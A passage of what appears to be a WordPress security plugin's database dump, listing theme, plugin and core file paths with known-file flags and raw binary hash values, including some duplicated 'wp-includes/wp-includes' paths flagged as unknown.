*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('ߴ:�������wh','wp-content/themes/Endolf/content-page.php',0,'����,�,�y/e����','����,�,�y/e����','��?Z� �`!o_�I��ieC���/l�','',0,'?'),('ߵ�H�\'�K�wwʿ�%-','wp-content/themes/hueman/assets/front/img/demo/8-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U�}}$\"�G','4��J#�\n�B�N�0����@Z�0�j�','',0,'?'),('߶>�D[�vQi�4`��k','wp-includes/wp-includes/images/smilies/icon_question.gif',0,'��[-\0�\'��W��F','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('߹V�=���\"�#n� �','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('��G]��9���e7��(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���7[�x�蛴','8�I��ԉo�)\'z�R�^�-M1\'�\0����','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��$dp���C����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'�ZP��ie����','6m�<g��\0{tX��)��U�4�N�4M�3','',0,'?'),('�������ä���=-�','wp-content/themes/advance/inc/kirki/assets/js/controls/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��eş+�\r�� ���','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���+(7�D��',')�vIy��a��\"?����@v�pYAqJ���>�','',0,'?'),('��5��O}P�=�NU�p','wp-includes/wp-includes/class-wp-customize-control.php',0,'���(���H�g1k!~','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('����4���\Za���','wp-includes/wp-includes/class-feed.php',0,'���>�y�ܫ��]��T','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),('�|0oC�|U_p��','wp-content/themes/gambit/template-parts/post-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٟ�[���������ƭ','hr�0�3�4}5��$6�H^�\'�\0�� �Y�i%','',0,'?'),('��:ק���n�hE��','wp-content/themes/promote/parts/part-welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rG=������Q\\��','AR�������ZբTUF�g�[WU&@⫮#dW','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�$|#���!�<�Eh�','wp-content/themes/promote/inc/kirki/includes/class-kirki-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�˥��q�\r\'l*���','�E�(�\ru��\nP18dy��h�R�����k�q','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��r�݇o��','�Yb�eA\'�#�đÎؚ��[9��=-&S�TT�','',0,'?'),('�&}��\n00��C��Ҭ','wp-content/themes/showcase-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oy�-�B�r�ݲ��\"','�K*�ê\"��v���dmf��k�c�^��','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�8�)��#�uJ�N{P��','wp-content/themes/weblog/assets/library/SlickNav/jquery.slicknav.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꖋі�r�ײ��D','�����#��v�o$�Eq#8�5���YƂ','',0,'?'),('�?7�`��9���Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��If�D�S~�Ee;\"','-�L\\Z�%���Er_^nniW�B-�mC���5A','',0,'?'),('�Dv���KB���U4\n','wp-includes/wp-includes/css/dist/format-library/style.min.css',0,'�t���A8�x��l�','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ�� \0y','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����mP�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�t}\\[����d�','wp-includes/wp-includes/js/plupload/moxie.min.js',0,'�|A��09��K�:���','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('��&�V*o�����)�','wp-content/themes/sg-window/sidebar-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�5�\n�w�7�f�','H�wBbE���w9\\�H�J\"�!�V�� ķ�=','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� 6]������(','X��L*��7ݬ��*����?�@w��\\c','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('�rx{VK#A��Q�@','wp-content/themes/kidzoo-lite/template-parts/content-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rR{��ng�7�`���','Ͼ�_kݒ�/�YS�5 ��(�ӆ��~�','',0,'?'),('అ��GX9�1E�ֳ','wp-content/themes/hueman/assets/front/img/sidebar/s-right-s1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�\"c�7d�[9���','�!t��u�;[/)�y\\U�Y����O(f}��.','',0,'?'),('����o��ʠ���','wp-includes/wp-includes/images/rss-2x.png',0,'�Ya[�Q���rj�','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('���ba;������J=�','wp-content/themes/sg-window/archive-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ҷ�\0�d)��','�E�x�V��62��r�1���\\��g��!','',0,'?'),('��\Z�$]�W��wP�l','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��--�� �2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('�VDc|!��6��#�','wp-content/themes/Endolf/functions.php',0,' ���nj|f�?�y�N�y',' ���nj|f�?�y�N�y',']����}���0�gSn���V���\r[娈.f','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�+��V\\_�ޢ��','wp-content/themes/pine/admin/css/pine-customize-control-social-buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������9�$6���A','L���MDžC���!H���N K0�m���ﷃ�z','',0,'?'),('�86fod�/J��v�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_[M\"]���00�ö�P','U���jA ��\n�a�cD��_�Q\"-��.� �','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�F:�ycK�X�5<y�a','wp-content/themes/fastblog/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!\\�sd�w�?��','-~s�k� �Ԭ\\lFA��cD�NZ\r�-f','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�pz$]��?gj�','��������<��^�M�v��5�Ò����j','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('�b��VE��7f�� ','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NI\0�/i���~��','�����\\&��r-������J������͠#','',0,'?'),('�c@�0����k �>EW','wp-content/themes/fastblog/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wb7Y��tj����','M���d*��\\I��#�拟�,�r�̲Y<=q�+','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('�p�|��\nd� x/`=�','wp-content/themes/event/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�%dT�)0 \"`�',']@1_,I�R]�*3l�� ��pFۅ�wN��Ύ\"','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?:Ĉ�-�żѐ\\x)p','�2�-�X����)��\rP�����bV�ҝb)sV','',0,'?'),('�wR V;(�N��S���6','wp-content/themes/wp-barrister/people-post-type-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�X���8�<�(J�','\"HE���X���E�/�u�l�q��ꓙ�','',0,'?'),('�*z1�OR���B�','wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',0,'�wyB���o�|��','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���Dq�\Zl܋]�','���%SC���xzg�Y3����$����)\'��\"','',0,'?'),('�\rY\"��\0&?UV','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�OPD*w�!��\ZO�','���Y��kܔw��:�]NV��^=ӽfTvQ','',0,'?'),('�>���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f�� ˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('���lS$c�N�gh*','wp-includes/wp-includes/rest-api/class-wp-rest-request.php',0,'��)0\0�����l3','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o�����\\�','��Zm�$z��p�uC��VgIgI���N�','',0,'?'),('�E]Q=5���x�<��2','wp-content/themes/auberge/assets/js/scripts-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-i2�\n��U�|','3�%�yϔ���tɔe�+/�w�ֻ>`�z^��4l','',0,'?'),('�8�C\0ko�� ����','wp-includes/wp-includes/js/jquery/ui/controlgroup.js',0,'/�mU��K\ZNP�*{�','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('�TD\Z\\�}^�5�L','wp-content/themes/maxbusiness/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0������uA��','>����\\��>+�.����ʪ��X�2�C','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��l`o�ݢ� �8�\Z','wp-content/themes/weblog/acmethemes/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:4l�ޕE�U�','�� VQn2�_���-y�h��&m�f�O�;+','',0,'?'),('�ҕ��%�n�d�h��I','wp-includes/wp-includes/js/dist/block-serialization-default-parser.js',0,'4��ņ��%ٔ2����','4��ņ��%ٔ2����','����H��l�Eb?�y̥l�N��+��6x�3m','',0,'?'),('�����Q#k��\n1��','wp-content/themes/Endolf/index.php',0,'ٕb�Eqܥ|C�V','ٕb�Eqܥ|C�V','@c�v�V�v\r�.�7��E�BQew��+(��','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e�4�6�g�p�o~�','',0,'?'),('�8�\n�����o��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�И�]e��Ğ�c%�I�','�\\H�XE�[����h�������YT��Uƥ','',0,'?'),('�]2�b�hV~���S','wp-content/themes/hueman/assets/front/img/header/yosemite-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�(2��ó�� ��/�','�y��i;�O��s�Ds#������V�A�!�','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('����\nº�N���','wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif',0,'Z��,�ntZ^6�{Lp�4','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('����n\"�XgyN�','wp-content/themes/kidzoo-lite/right-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�y\\\'�a19<=\\','_9E�%y\0�36��כb��?��j�<R �','',0,'?'),('�R�\Z��ѧdr_@��','wp-content/themes/newsmag/inc/widgets/posts_list_vertical/class-widget-newsmag-posts_list_vertical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�E��VGUy<ͼQ','i*�^8k�,40n3q��)@�� �mA@�u(��','',0,'?'),('�*\rE�2<�����\"','wp-content/themes/hueman/assets/front/img/demo/4-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�社�E2Hs�}�+�qn','��v�vGz+����* 7\'!B�k[�_T*�˥�','',0,'?'),('�8Իi�炙OG^X','wp-content/themes/event/inc/widgets/widgets-functions/register-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&+��I[wY3OOy3��','Fb�(�\Z��C\n<<�Vs�~H7Ύ�N��U���e','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�N�F�u�N��z���','wp-includes/wp-includes/SimplePie/Restriction.php',0,'[\"��~\'���$|2*�','[\"��~\'���$|2*�','�>�3� vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R �V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('�o��[Y��]Q��p�','wp-content/themes/Yegor/js/flexslider.js',0,'K���:\"W#R��b�','K���:\"W#R��b�','Ñv\nq�o�\r�1�l��!�4d[�%o�x���','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^=*Ƕ8���ؚ�','\\�(ִ\n�%y�F�1���=y�� �8�@ \"�a�','',0,'?'),('�{K~�ղ���Ų��ۨ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k&���}�;1','�.v;�q��]�m�,�\\ؔ���Zr�.�\n{','',0,'?'),('��:�6d�e\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӟ=:&��$.���W`vI','�u����y�Һ\0v�&�%�0)^�\ZA�6�','',0,'?'),('� ���.��%���(<','wp-includes/wp-includes/images/smilies/icon_redface.gif',0,'����U���E����','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U�� �L]-�Rs�@�','ֲP4]���! o3\n��l���Q�0�','',0,'?'),('�ń�ɼ\n�_�C^�.�','wp-content/themes/spidermag/assets/library/owlcarousel/css/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ѧ%�d#�ܔ&�E','R���qNp|���4:��-��h���D�%:�7A','',0,'?'),('�э�G��oD�����','wp-content/themes/wp-barrister/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��3�K�����&��','�#2f!�����4�����G��/Ȼ�|{','',0,'?'),('�ޙ�p�jY�!�?�\\�','wp-includes/wp-includes/customize/class-wp-customize-new-menu-control.php',0,'��N��p��aC�q�k','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��)�{)�%�','�{G���\n�<Q�IO� ���%�k���%','',0,'?'),('���~�*Tݐ���','wp-content/themes/newsmag/inc/components/breadcrumbs/class-newsmag-breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dn�j�H/>_�LAj��','�(�TU�;q+�_\0f�E1d�\\���r�&�\n','',0,'?'),('�\0��וoxi3%\r+]kg','wp-admin/images/post-formats.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���\0���%3���','9ƺ�&�]��n�Eu��a]iF���Ƴ�','',0,'?'),('�{����S��hG�od�','wp-content/themes/promote/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&<Q���,`�\\�','�DFs?Rdkw39�0z@�)��F�7ad@��','',0,'?'),('� ����p�H-l\0','wp-includes/wp-includes/js/jquery/ui/effect-highlight.js',0,'n+)�����I�L\r�','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('�\n�Ե��N3���E','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������þ�ڱ\nN��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('�\rSL<�8\0_��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ns(�y��\Z�l#�$','&���Q/�HT]���Պ�p�}��|e�ZVq9','',0,'?'),('�W@|�xܗ��rw�ڲ','wp-content/themes/hueman/assets/front/img/thumb-small-empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�W>������{l;�#',' yWtW̊�a��:��6��9�Ka��E�','',0,'?'),('�P���N���]U��OM','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z F����1FE�[/','�zQ0��E��5C\rl6�tߋ3ͺ\n�(Q�','',0,'?'),('�0�;�-,�A�Ey�','wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u; \0�&','',0,'?'),('�B��\"^I\n���hƜ','wp-includes/js/dist/dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��B�� @�0an�$','q�L\\i�q3���o���b�5�hk��� yzۋ','',0,'?'),('�Iie�b1o4#��b','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���j�ֺ�~�9&�','U? ��y�d��u�{m 5�3��>�՛�\n�\n�','',0,'?'),('�O�u�6��o�G��','wp-content/plugins/wp-cerber/assets/flags/lr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�a�!^KG�C �,�','b쁣������=Q��*���IGTG �!]E��9','',0,'?'),('�Vʰ�4�8�+��z','wp-content/themes/wp-barrister/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���5��r�B�O','�[BnI�\\�|D\'�#TLWj\"g�<9Ƀ��z��J','',0,'?'),('�a�Oj\'�ŻD*ցV4','wp-cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�>F�m8ɃK`�','hi��g��F���-�� 0&������yl�','',0,'?'),('�m�5^���u��9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zy���.^�(/t�t','�6�/|�\'��kI7Yҝ���8~l� �H���6','',0,'?'),('�tM�&�x�V�����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�142�%��F��)�','هO�x�,�{e>�z�Ɂ���s����2C��ܳ','',0,'?'),('�}\'�Ǧ@��g7��j�','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',0,'��1����v��R','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('�#�\' �~����/z�F','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޜ�t�j̥<�','�������T���� ?W��E>}�u���+��','',0,'?'),('�e�\\�k�c��Xf','wp-includes/customize/class-wp-customize-upload-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؓ�B8�?)ivr��`-�','�~t~��X���% ��K/3-n6\0�RB�֨G�','',0,'?'),('��.Cq���t�c=M$�','wp-content/themes/promote/inc/kirki/includes/settings/class-kirki-settings-default-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`(��bꂙ�^u\':','�M��ef�>�y�e5���\\�N{$kk��','',0,'?'),('��J���l���h�','wp-includes/wp-includes/rest-api/class-wp-rest-server.php',0,'\0}��7V5�I�385','\0}��7V5�I�385','SB5}�uٵŶ/�����S�5%�8�z�V�','',0,'?'),('���n���8�y�YP','wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css',0,'�����(����6�','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('�Ʌ�;b:�<��ġ^6','wp-content/themes/gambit/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���ot�Q�q�/6n,','ҸEb�\'��\"�D�a�m��y�SBGn���e��','',0,'?'),('�ړN�P*X5���w','wp-includes/wp-includes/css/editor.css',0,'��`b�L֏�Uy�/','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('��q�82��v�&#M','wp-includes/js/tinymce/plugins/wpview/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j5q��S\rX���i��','Ej\Z��\Z�I���3J��G�jVݒ��6<S�9P','',0,'?'),('��H�����%��,��','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('���Wp�&���6�','wp-content/themes/skt-pathway/images/favicon.ico',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��\0�~V�,O�Fx','@��@�����N��kl>]���^~Y���','',0,'?'),('���<kUJv%��1��','wp-includes/fonts/dashicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7����|�����Z','�D��D+ve�h��s>���Z�fo��vW�~,=','',0,'?'),('��%���}��i�','wp-content/themes/advance/inc/customizer/fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�r�0�a�X_�͖Zw','�LN�\\A^G�,�M5�~��.� �h%7rM*','',0,'?'),('�;f:x���J\"��J','wp-content/themes/hueman/parts/header-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lgɳ߾��\n��6�','�Ad���t0*j�m�+���Ȁ���9��ȅ','',0,'?'),('�~�Soֆ��2��','wp-includes/wp-includes/customize/class-wp-widget-area-customize-control.php',0,'��<w܌*�t���!�','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('���#�iJ�H�?�@�','wp-includes/class-wp-http-curl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y�� �]�2','',0,'?'),('�w����V���!�','wp-admin/includes/class-wp-ms-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8�����Lk�5�Ѕ','�\'�<o��\'.��G�\"��v�2gwi̋\0','',0,'?'),('�\r����a�!)��lM�T','wp-content/themes/wp-barrister/library/images/icon-search-w.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nk\'� \0.�3�x��','�z��[�MQ<���U� ��9�@s��\rk�','',0,'?'),('��z~{��Q@���L|','wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css',0,'�k(O�1m<�0v��vV','�k(O�1m<�0v��vV','���1�q�XX|ί}Cw�}�o�]5F\n�~��','',0,'?'),('�\Z�K�^���\n�','wp-includes/blocks/image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�s�d\'���+h���','�,)�\Z����Z8��u�A�,i^���bes�t','',0,'?'),('�/��UH�R�\0���m','wp-content/themes/anima/includes/styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M*D���۪���','А̚�LR&\0�g���PC�]$q>ȍH��>r��','',0,'?'),('�7H-��0�\\t�\nC�','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md',0,'Y��ϛ�vj��\n���','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�=��xv�\\���TsG�','wp-content/themes/h